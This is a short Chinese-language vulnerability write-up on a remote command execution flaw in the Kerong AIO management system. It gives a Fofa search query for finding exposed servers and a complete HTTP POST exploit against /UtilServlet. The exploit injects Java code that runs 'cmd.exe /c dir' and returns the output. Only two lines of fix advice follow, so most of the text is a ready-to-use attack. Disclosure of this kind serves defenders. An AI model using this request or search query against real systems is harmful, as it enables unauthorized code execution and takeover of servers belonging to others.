0x01 漏洞描述:
科荣AIO管理系统存在命令执行漏洞,攻击者可以通过构造恶意请求,进行远程代码执行。可导致服务器失陷,为确保系统安全,建议尽快修复漏洞。
0x02 搜索语句:
Fofa:body="changeAccount('8000')"
0x03 漏洞复现:
POST /UtilServlet HTTP/1.1
Host:your-ip
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:322
operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+dir").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
0x04 修复建议:
如⾮必要,禁⽌公⽹访问该系统
请及时升级产品到最新版本